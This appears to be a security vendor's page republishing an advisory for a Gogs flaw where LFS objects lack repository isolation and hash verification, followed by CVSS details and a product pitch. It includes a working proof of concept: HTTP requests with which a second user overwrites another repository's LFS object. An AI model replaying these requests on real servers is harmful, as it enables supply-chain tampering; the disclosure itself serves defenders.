Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-25921 — gogs

🔴 CVSS 9.5 — Critical ⚠️ Exploit Public CWE-345 NVD
9.5
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Gogs: Cross-repository LFS object overwrite via missing content hash verification

Summary

Overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers.

Details

Gogs store all LFS objects in the same place, no isolation between different repositories. (repo id not concatenated to storage path) https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L52-L58

Gogs does not verify uploaded LFS file content against its claimed SHA-256, meaning attackers can manipulate the uploaded file like injecting backdoor. https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/lfsutil/storage.go#L79-L89

Here's the comment that trust client to retry upload allowing them to overwrite. However, this assumption does not hold in the case of a malicious client. https://github.com/gogs/gogs/blob/7a2dffa95ac64f31c8322cb50d32694b05610144/internal/route/lfs/basic.go#L111-L113

PoC

```

# ./gogs -v

Gogs version 0.13.0

```

1. User (admin1) upload a LFS object into their repository admin1/testlfs.git normally

```

POST http://172.29.121.170/admin1/testlfs.git/info/lfs/objects/batch

User-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)

Accept-Encoding: gzip, deflate, br

Accept: application/vnd.git-lfs+json

Connection: keep-alive

Content-Type: application/vnd.git-lfs+json

Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=

Content-Length: 168

{"operation": "upload", "objects": [{"oid": "5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a", "size": 1048576}], "ref": {"name": "refs/heads/master"}}

response: <Response [200]>

Connection: close

Content-Length: 438

Content-Type: application/vnd.git-lfs+json

Date: Thu, 28 Nov 2024 13:57:47 GMT

Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

{'objects': [{'actions': {'upload': {'header': {'Content-Type': 'application/octet-stream'},

'href': 'http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a'},

'verify': {'href': 'http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify'}},

'oid': '5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a',

'size': 1048576}],

'transfer': 'basic'}

[STEP3] file_upload PUT http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a

headers: {'Content-Type': 'application/octet-stream', 'Accept': 'application/vnd.git-lfs+json', 'Authorization': 'Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI='}

response: <Response [200]>

[verify POST] http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify

POST http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/verify

User-Agent: git-lfs/3.0.2 (GitHub; linux amd64; go 1.17.2)

Accept-Encoding: gzip, deflate, br

Accept: application/vnd.git-lfs+json

Connection: keep-alive

Content-Type: application/vnd.git-lfs+json

Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=

Cookie: lang=en-US

Content-Length: 92

{"oid": "5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a", "size": 1048576}

response: <Response [200]>

Connection: close

Content-Length: 0

Date: Thu, 28 Nov 2024 13:57:47 GMT

```

In this step, upload a LFS object 5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a

2. Attacker user2 overwrite this file by uploading manipulated content to their repo user2/public.git

```

PUT http://172.29.121.170:3000/user2/public.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a

Content-Type: application/octet-stream

Accept: application/vnd.git-lfs+json

Authorization: Basic dXNlcjI6NTRmZGU5ZmI3YjdmOTQ0MmM3MzY4ODhlMWIyNjZmMWE4MzAyMzE5NQ==

response: <Response [200]>

```

3. Verify the content has been overwritten:

```

# curl http://172.29.121.170:3000/admin1/testlfs.git/info/lfs/objects/basic/5f8c5042d51400e9e2e9bed01353edacf72edc88340038145229cd494b5fe08a -H "Authorization: Basic YWRtaW4xOjg2ZjgxMmNkNDBiODY1YmIzZGQ1NTgyNDI2OTE2M2FmNDM3ZGZjZWI=" -i

HTTP/1.1 200 OK

Content-Length: 1048576

Connection: keep-alive

Content-Type: application/octet-stream

Date: Thu, 28 Nov 2024 14:01:53 GMT

Keep-Alive: timeout=4

Proxy-Connection: keep-alive

Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647

curl: (18) transfer closed with 1048563 bytes remaining to read

2222 replaced

```

Impact

All LFS objects hosted on Gogs can be maliciously overwritten. Supply-chain attack is possible, and when user download LFS object from webpage, there's no warning at all.

Fix Suggestion

Uploaded LFS objects must be verified to ensure their content matches the claimed SH

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality none, integrity high, availability low.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Changed — a successful attack reaches components beyond the vulnerable one.
  • Confidentiality impact: None.
  • Integrity impact: High — total loss, or loss the attacker controls.
  • Availability impact: Low — limited, and the attacker does not choose what is affected.

Weakness class

CVE-2026-25921 is classified as CWE-345: Insufficient Verification of Data Authenticity. Data is trusted without confirming it really came from the claimed source and was not altered.

Affected software

CVE-2026-25921 is recorded against 2 packages.

  • gogs (fixed in 0.14.2)
  • gogs.io/gogs

Timeline and source

Published on 5 March 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com
github.com
github.com

Other advisories for this package

gogs has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-345: Insufficient Verification of Data Authenticity) in other software:

Details

Severity CRITICAL
CVSS Score 9.5
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L
CWE CWE-345
Public Exploit ⚠️ Yes
Source NVD
Published 2026-03-05
Updated 2026-08-20
Modified 2026-06-17

Affected Packages

Software From version Fixed in
gogs 0.14.2
gogs.io/gogs

Similar Threats

Exploit Protection

Are you running gogs?

CVE-2026-25921 carries CVSS 9.5 Critical rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-25921 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026